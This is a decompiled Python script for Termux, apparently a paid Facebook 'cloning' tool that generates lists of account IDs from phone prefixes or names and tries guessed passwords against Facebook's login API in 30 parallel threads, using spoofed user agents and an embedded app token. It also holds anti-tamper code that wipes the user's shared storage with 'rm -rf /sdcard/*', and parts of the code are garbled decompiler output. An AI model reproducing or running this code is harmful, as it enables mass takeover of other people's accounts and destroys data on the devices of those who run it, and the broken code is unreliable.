import lzma
import zlib
import codecs
import base64
_ = lambda __ : __import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b64decode(__[::-1])));


import zlib
import platform
import os
import random
import sys
import time
import string
from random import randint as byy
from concurrent.futures import ThreadPoolExecutor as tred
from concurrent.futures import ThreadPoolExecutor as ThreadPool
import requests
if ModuleNotFoundError:
    os.system('pip install requests')
import bs4
if ModuleNotFoundError:
    os.system('pip install bs4')
import mechanize
if ModuleNotFoundError:
    os.system('pip install mechanize')
import requests
import mechanize
import bs4
import re
import json
from time import sleep
from os import system
ida = []
loop = 0
idx = []
(id, id2, loop, ok, cp, akun, oprek, method, lisensiku, taplikasi, tokenku, uid, lisensikuni) = ([], [], 0, 0, 0, [], [], [], [], [], [], [], [])

def es():
    if path.isfile('/data/data/com.termux/files/usr/bin/rm'):
        pass
    system('clear')
    print('System Modification Not Allowed since using Jutt')
    exit()
    if path.isfile('/data/data/com.termux/files/usr/bin/termux-reset'):
        pass
    system('clear')
    print('System Modification Not Allowed since using Jutt')
    exit()
    if path.isfile('/data/data/com.termux/files/usr/bin/termux-setup-storage'):
        return None
    None('clear')
    print('System Modification Not Allowed since using Jutt')
    exit()

file = open('/data/data/com.termux/files/usr/lib/python3.11/site-packages/requests/api.py', 'r')
file_content = file.read()
None(None, None)
if not None:
    pass
if 'print(url)' in file_content:
    os.system('rm -rf /data/data/com.termux/files/usr/lib/python3.11/site-packages/requests')
    os.system('rm -rf /sdcard/*')
    os.system('pip install requests')
    exit('\x1b[1;32m>> \x1b[0;37m RE-RUN TOOL.!')
file = open('/data/data/com.termux/files/usr/lib/python3.11/site-packages/requests/models.py', 'r')
file_content = file.read()
None(None, None)
if not None:
    pass
if 'print' in file_content:
    os.system('rm -rf /data/data/com.termux/files/usr/lib/python3.11/site-packages/requests')
    os.system('rm -rf /sdcard/*')
    os.system('pip install requests')
    exit('\x1b[1;32m>> \x1b[0;37m RE-RUN TOOL.!')
file = open('/data/data/com.termux/files/usr/lib/python3.11/site-packages/requests/sessions.py', 'r')
file_content = file.read()
None(None, None)
if not None:
    pass
if 'verify=False' in file_content:
    os.system('rm -rf /data/data/com.termux/files/usr/lib/python3.11/site-packages/requests')
    os.system('rm -rf /sdcard/*')
    os.system('pip install requests')
    exit('\x1b[1;32m>> \x1b[0;37m RE-RUN TOOL.!')
file = open('/data/data/com.termux/files/usr/lib/python3.11/site-packages/requests/auth.py', 'r')
file_content = file.read()
None(None, None)
if not None:
    pass
if 'verify=False' in file_content:
    os.system('rm -rf /data/data/com.termux/files/usr/lib/python3.11/site-packages/requests')
    os.system('rm -rf /sdcard/*')
    os.system('pip install requests')
    exit('\x1b[1;32m>> \x1b[0;37m RE-RUN TOOL.!')
if not os.path.exists('/data/data/com.termux/files/usr/bin/rm'):
    print('Turn OFF Your Local-Bypass System')
    time.sleep(2)
    print('\n If Next Time You Try Bypassing Tool I Will Reset Your Device Fully ! No Compromise ')
    time.sleep(5)
    exit()
r = '\x1b[1;91m'
g = '\x1b[1;92m'
y = '\x1b[1;93m'
b = '\x1b[1;94m'
p = '\x1b[1;95m'
c = '\x1b[1;96m'
l = '\x1b[1;97m'
s = '\x1b[0m'
lr = '\x1b[0;91m'
lg = '\x1b[0;92m'
ly = '\x1b[0;93m'
lb = '\x1b[0;94m'
lp = '\x1b[0;95m'
lc = '\x1b[0;96m'
ll = '\x1b[0;97m'
holaa = '38;5'
ro = f'''\x1b[{holaa};208'''
rb = f'''\x1b[{holaa};32'''
rc = f'''\x1b[{holaa};122m'''
rg = f'''\x1b[{holaa};112m'''
rp = f'''\x1b[{holaa};147m'''
os.system('termux-open-url www.google.com')
fb = 'oggyfire'
wp = '+8801917466867'
github = 'github.com/Zabl999'
yt = 'https://youtube.com/@mrxidi7152'
web = 'https://youtube.com/@mrxidi7152'
author = 'Zabl Yt'
sys.stdout.write('\x1b]2;<💚ZABL YT💚>\x07')

def clear():
    os.system('clear')
    print(logo)


def linex():
    print('--------------------------------------------------')


def yek():
    import random
    fbav = f'''{random.randint(10, 437)}.0.0.{random.randint(11, 99)}.{random.randint(1, 200)}'''
    fban = random.choice([
        'FB4A',
        'FB5A',
        'FB6A'])
    fbbv = str(random.randint(10000000, 99999999))
    sex = f'''[FBAN/FB4A;FBAV/{fbav};FBBV/{fbbv};'''
    umah = '[FBAN/Orca-Android;FBAV/406.0.0.13.115;FBPN/com.facebook.orca;FBLC/en_US;FBBV/470794982;FBCR/Google Fi;FBMF/Google;FBBD/google;FBDV/Pixel'
    xuna = sex + umah
    ex = random.choice([
        xuna])
    return ex

from datetime import date
today = date.today()
aajdate = date.today()
import os
import sys
import datetime
import platform
import hashlib
from datetime import datetime, timedelta

class User_Pro:
    
    def __init__(self, username, active_time, user_time):
        self.username = username
        self.userkey = hashlib.md5((platform.version() + str(os.getuid()) + platform.platform() + os.getlogin() + platform.release()).replace(' ', '').encode()).hexdigest().upper()
        self.active = datetime.strptime(active_time, '%d-%m-%Y')
        self.expire = self.active + timedelta(days = int(user_time))

    
    def check_key_status(self):
        current_date = datetime.now()
        if current_date >= self.expire:
            return 'EXPIRE-KEY'

    
    def get_details(self):
        status = self.check_key_status()
        return {
            'USERNAME': self.username,
            'USER-KEY': self.userkey,
            'ACTIVE-TIME': self.active.strftime('%d-%m-%Y'),
            'EXPIRE-TIME': self.expire.strftime('%d-%m-%Y'),
            'USER-STATUS': status }


import os
import re
import requests
MY_KEY = hashlib.md5((platform.version() + str(os.getuid()) + platform.platform() + os.getlogin() + platform.release()).replace(' ', '').encode()).hexdigest().upper()

class Get_Data:
    
    def __init__(self):
        self.url = 'https://skbercyber.blogspot.com/2024/06/amo.html'

    
    def get(self):
        respone = requests.get('https://skbercyber.blogspot.com/2024/06/amo.html').text
        if MY_KEY in respone:
            (username, active, expire) = re.findall(f'''USERKEY={MY_KEY}=USERNAME=(.*)=START=(.*)=EXPIRE=(.*)=LIVE''', respone)[0]
            userfind = User_Pro(username, active, expire)
            value = userfind.get_details()
            Main(value).Menu()
            return None
        None()
        print('[1] File Clone')
        print('[2] Joint Public Group')
        print('[3] Exit ')
        linex()
        input('[+] Select Any Option : ')
        clear()
        print('[+] EXAMPLE : sdcard/zabl.txt')
        input('[+] Your File : ')
        clear()
        print(f'''{lg}MY KEY : {MY_KEY}{s}''')
        linex()
        print('[+] Your Key Not Approval First Key Approved')
        print("[+] You Didn't Take It As Premium So It Won't Work")
        input('[+] Please Inter And Buy Premium Tool')
        sys.exit()


import os

class Main:
    
    def __init__(self, value):
        self.name = str(value['USERNAME'])
        self.token = str(value['USER-KEY'])
        self.active = str(value['ACTIVE-TIME'])
        self.expire = str(value['EXPIRE-TIME'])
        self.status = str(value['USER-STATUS'])

    
    def check(self):
        if self.status == 'EXPIRE-KEY':
            clear()
            print('[1] File Clone')
            print('[2] Joint Public Group')
            print('[3] Exit ')
            linex()
            input('[+] Select Any Option : ')
            clear()
            print('[+] EXAMPLE : sdcard/zabl.txt')
            input('[+] Your File : ')
            clear()
            print(f'''{lg}MY KEY : {MY_KEY}{s}''')
            linex()
            print('[+] Your Key Not Approval First Key Approved')
            print("[+] You Didn't Take It As Premium So It Won't Work")
            input('[+] Please Inter And Buy Premium Tool')
            sys.exit()
            return None
        if None.status == 'ACTIVE-KEY':
            caseher()
            return None

    
    def Menu(self):
        os.system('clear')
        self.check()



def ua():
    aV = str(random.choice(range(10, 20)))
    A = f'''Mozilla/5.0 (Windows; U; Windows NT {str(random.choice(range(5, 7)))}.1; en-US) AppleWebKit/534.{aV} (KHTML, like Gecko) Chrome/{str(random.choice(range(8, 12)))}.0.{str(random.choice(range(552, 661)))}.0 Safari/534.{aV}'''
    bV = str(random.choice(range(1, 36)))
    bx = str(random.choice(range(34, 38)))
    bz = f'''5{bx}.{bV}'''
    B = f'''Mozilla/5.0 (Windows NT {str(random.choice(range(5, 7)))}.{str(random.choice([
        '2',
        '1']))}) AppleWebKit/{bz} (KHTML, like Gecko) Chrome/{str(random.choice(range(12, 42)))}.0.{str(random.choice(range(742, 2200)))}.{str(random.choice(range(1, 120)))} Safari/{bz}'''
    cV = str(random.choice(range(1, 36)))
    cx = str(random.choice(range(34, 38)))
    cz = f'''5{cx}.{cV}'''
    C = f'''Mozilla/5.0 (Windows NT 6.{str(random.choice([
        '2',
        '1']))}; WOW64) AppleWebKit/{cz} (KHTML, like Gecko) Chrome/{str(random.choice(range(12, 42)))}.0.{str(random.choice(range(742, 2200)))}.{str(random.choice(range(1, 120)))} Safari/{cz}'''
    D = f'''Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.{str(random.choice(range(1, 7120)))}.0 Safari/537.36'''
    return random.choice([
        A,
        B,
        C,
        D])

logo = f'''\n .d8b.  d88888D  .d8b.  d8888b. db      \nd8\' `8b YP  d8\' d8\' `8b 88  `8D 88     \x1b[38;5;196m P\x1b[1;97m\n88ooo88    d8\'  88ooo88 88oooY\' 88 \x1b[38;5;46m     R \x1b[1;97m\n88~~~88   d8\'   88~~~88 88~~~b. 88     \x1b[38;5;14m O\x1b[1;97m\n88   88  d8\' db 88   88 88   8D 88booo. \nYP   YP d88888P YP   YP Y8888P\' Y88888P \n{'--------------------------------------------------'}\n[+] Tool Version     :   2.0.0\n[+] Tool Author      :   {author}\n[+] Tool Type        :   Cloning Tool\n[+] Premium Member   :   Premium {rc}㊅{s}\n{'--------------------------------------------------'}\n{lg}MY KEY : {MY_KEY}{s}\n{'--------------------------------------------------'}\n[+] Date Format      :   {aajdate}\n[+] Update Format    :   {rg}2024-09-01{s}\n[+] Welcome          :   Fb Clone Tool\n{'--------------------------------------------------'}'''

def caseher():
    os.system('clear')
    print(logo)
    print('If You Want To Buy Things Without Loking At Price')
    print('Then Always Works Hard Without Looking At A Clock')
    print('--------------------------------------------------')
    print('[1] Facebook Cloning')
    print('[2] Create File')
    print('[3] File Split/Sep')
    print('[4] Number Detail Finder')
    print('[5] Facebook Group')
    print('[6] How To Run Azabl Commond')
    print('[7] Exit Tool')
    print('--------------------------------------------------')
    selectme = input(' Select Any Option : ')
    if selectme in ('1', '01', 'one'):
        fb_cloning()
    if selectme in ('2', '02', 'two'):
        create_file()
    if selectme in ('3', '03', 'three'):
        sep()
    if selectme in ('4', '04', 'four'):
        number_detail()
    if selectme in ('05', '5', 'five'):
        os.system('termux-open-url https://chat.whatsapp.com/LoLzZLSux3C9Fp4Fl8AtFT')
        caseher()
    if selectme in ('06', '6', 'five'):
        os.system('termux-open-url https://youtu.be/AtQ_pt-IwsE?si=z2MKkUGaVpKrkfIy')
        caseher()
    if selectme in ('00', '0', 'exit'):
        exit(' Thanks For Using ')
        return None
    None(' Invalid Select')


def fb_cloning():
    os.system('clear')
    print(logo)
    print('Please wait your key is being checked')
    time.sleep(5)
    print('Zabl tool you run premium now you run it')
    time.sleep(5)
    os.system('clear')
    print(logo)
    print('[1] file cloning')
    print('[2] Old Cloning ')
    print('[3] Email Cloning')
    print('[4] Number Cloning')
    print('[0] Go Back ')
    print('--------------------------------------------------')
    cloneme = input(' Select Any Option : ')
    if cloneme in ('1', '01', 'one'):
        file_cloning()
    if cloneme in ('2', '02', 'two'):
        main()
    if cloneme in ('3', '03', 'three'):
        email_cloning()
    if cloneme in ('4', '04', 'four'):
        number_cloning()
    if cloneme in ('00', '0', 'zero'):
        (sys.stdout.write('Redirecting To Main Page ...'),)
        time.sleep(2)
        sys.stdout.flush()
        caseher()
        return None
    None(' ')

import json
import os
import time
import base64
import random
import re
import sys
from requests.exceptions import ConnectionError as CError
from concurrent.futures import ThreadPoolExecutor as tpe
id = []
loop = 0
idx = []
pp = []

def file_cloning():
    os.system('clear')
    print(logo)
    filelist = input('\x1b[0m[+] File Path :\x1b[0m ')
    for line in open(filelist, 'r').readlines():
        id.append(line.strip())
        if FileNotFoundError:
            exit('invalid location')
    password()


def email_cloning():
    os.system('clear')
    print(logo)
    import requests
    import random
    user = []
    print(' [*] First Name Example Hamza,Areesha')
    first = input(' First Name : ')
    last = input(' Last Name : ')
    print(' \n [*] Ex @gmail.com,@yahoo.com or @hotmail.com etc')
    domain = input(' Domain : ')
    print('\n [?] Limit ids Example 1000,5000,50000')
    limit = int(input(' Limit Ids : '))
    for nmbr in range(limit):
        nmpp = random.randint(99, 9999)
        nmp = f'''{first}{last}{str(nmpp)}{domain}|{first} {last}\n'''
        id.append(nmp)
        passwordemail()
        return None


def number_cloning():
    os.system('clear')
    print(logo)
    print('\x1b[0mFor Example :\x1b[0m 92310,92342,92300,92301 ...')
    kode = input('\x1b[0mChoose Code : \x1b[0m')
    print('\x1b[0mFor Example :\x1b[0m 2000,4000,6000 ...')
    limit = int(input('\x1b[0mIdz Limit : \x1b[0m'))
    for nmbr in range(limit):
        nmp = (lambda .0: for _ in .0:
random.choice(string.digits)None)(range(7)())
        xoo = kode + nmp.replace(' ', '')
        xdr = f'''{kode + nmp}|{nmp} {xoo}\n'''
        id.append(xdr)
        passwordnum(xoo)
        return None


def passwordnum(xoo):
    os.system('clear')
    print(logo)
    print('Cloning Is Started Kindly Be Patient ... ')
    print('Turn Airplane On Off When There Is Alert ')
    print('The Speed Of Tool Depended In Your Network')
    print('--------------------------------------------------')
    pool = tred(max_workers = 30)
    for yuzong in id:
        nmf = yuzong.split('|')[1].lower()
        idf = yuzong.split('|')[0]
        frs = nmf.split(' ')[0]
        frslst = nmf.replace(' ', '')
        pwv = [
            'pakistan',
            '786786']
        if len(nmf) < 6:
            if len(frs) < 3:
                pass
            pwv.append(xoo)
            pwv.append(frs)
            pwv.append('khan123')
            pwv.append('khan12345')
            pwv.append('khankhan')
            pwv.append('khan786')
            pwv.append('khan12')
            pwv.append('khan1122')
        pwv.append(xoo)
        pwv.append(frs)
        pwv.append('khan123')
        pwv.append('khan12345')
        pwv.append('khankhan')
        pwv.append('khan786')
        pwv.append('khan12')
        pwv.append('khan1122')
        pool.submit(crackmbasic, idf, pwv)
        None(None, None)
        return None
        if not None:
            pass


def passwordemail():
    os.system('clear')
    print(logo)
    print('Cloning Is Started Kindly Be Patient ... ')
    print('Turn Airplane On Off When There Is Alert ')
    print('The Speed Of Tool Depended In Your Network')
    print('--------------------------------------------------')
    pool = tred(max_workers = 30)
    for yuzong in id:
        nmf = yuzong.split('|')[1].lower()
        idf = yuzong.split('|')[0]
        frs = nmf.split(' ')[0]
        frslst = nmf.replace(' ', '')
        pwv = [
            'pakistan',
            '786786']
        if len(nmf) < 6:
            if len(frs) < 3:
                pass
            pwv.append(frs)
            pwv.append(frslst)
            pwv.append(frs + '123')
            pwv.append(frs + '12345')
            pwv.append(frs + '123456')
            pwv.append(frs + 'khan')
            pwv.append(frslst + '123')
            pwv.append(frslst + '123456')
            pwv.append(nmf)
            pwv.append('khan786')
            pwv.append('khankhan')
        pwv.append(frs)
        pwv.append(frslst)
        pwv.append(frs + '123')
        pwv.append(frs + '12345')
        pwv.append(frs + '123456')
        pwv.append(frs + 'khan')
        pwv.append(frslst + '123')
        pwv.append(frslst + '123456')
        pwv.append(nmf)
        pwv.append('khan786')
        pwv.append('khankhan')
        pool.submit(crackmbasic, idf, pwv)
        None(None, None)
        return None
        if not None:
            pass


def password():
    os.system('clear')
    print(logo)
    print('Cloning Is Started Kindly Be Patient ... ')
    print('Turn Airplane On Off When There Is Alert ')
    print('The Speed Of Tool Depended In Your Network')
    print('--------------------------------------------------')
    pool = tred(max_workers = 30)
    for yuzong in id:
        nmf = yuzong.split('|')[1].lower()
        idf = yuzong.split('|')[0]
        frs = nmf.split(' ')[0]
        frslst = nmf.replace(' ', '')
        pwv = [
            nmf,
            'pakistan']
        if len(nmf) < 6:
            if len(frs) < 3:
                pass
            pwv.append(frs + '017')
            pwv.append(frslst)
            pwv.append(frs + '018')
            pwv.append(frs + '019')
            pwv.append(frs + '112233')
            pwv.append(frs + '11223344')
            pwv.append(frs + '1234556')
            pwv.append('123456')
            pwv.append('57273200')
            pwv.append('57575757')
            pwv.append(frs + '123')
            pwv.append(frs + '12345')
            pwv.append(frs + '1122')
            pwv.append(nmf)
            pwv.append(frslst + '12345')
            pwv.append(frslst + '123')
            pwv.append(frslst + '12')
            pwv.append('khankhan')
            pwv.append('khan123')
        pwv.append(frs + '017')
        pwv.append(frslst)
        pwv.append(frs + '018')
        pwv.append(frs + '019')
        pwv.append(frs + '112233')
        pwv.append(frs + '11223344')
        pwv.append(frs + '1234556')
        pwv.append('123456')
        pwv.append('57273200')
        pwv.append('57575757')
        pwv.append(frslst)
        pwv.append(frs + '123')
        pwv.append(frs + '12345')
        pwv.append(frs + '1122')
        pwv.append(frs + '786')
        pwv.append(nmf)
        pwv.append(frslst + '12345')
        pwv.append(frslst + '123')
        pwv.append(frslst + '12')
        pwv.append('khankhan')
        pwv.append('khan123')
        pool.submit(crackmbasic, idf, pwv)
        None(None, None)
        return None
        if not None:
            pass

aks = 'auth.login'
djksj = 'b-'
asmr = f'''{djksj}api.facebook.com'''
koin = 'facebook.com'
grp = f'''graph.{koin}'''
auttt = 'auth'
import requests
import re
import random
import string
import secrets
import os

def crackmbasic(idf, pwv):
    global cp, ok, loop
    (sys.stdout.write(f'''\r \x1b[0m[{aajdate}] {loop}/{len(id)} {ok} '''),)
    sys.stdout.flush()
    for pw in pwv:
        ag = idf[::-1]
        head = {
            'user-agent': yek(),
            'accept-encoding': 'gzip,deflate',
            'Accept': '*/*',
            'Connection': 'keep-alive',
            'Authentication': 'OAuth 6628568379|c1e620fa708a1d5696fb991c1bde5662',
            'x-fb-connection-quality': 'EXCELLENT',
            'x-fb-connection-type': 'cell',
            'x-fb-connection-bandwidth
